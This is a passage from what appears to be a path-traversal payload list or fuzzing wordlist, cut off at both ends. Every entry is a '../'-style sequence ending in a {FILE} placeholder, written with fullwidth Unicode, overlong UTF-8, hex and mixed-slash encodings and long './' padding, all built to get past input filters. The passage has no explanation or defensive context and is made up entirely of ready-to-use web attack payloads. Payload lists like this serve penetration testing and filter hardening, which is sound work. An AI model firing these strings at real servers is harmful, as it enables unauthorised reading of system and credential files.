0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//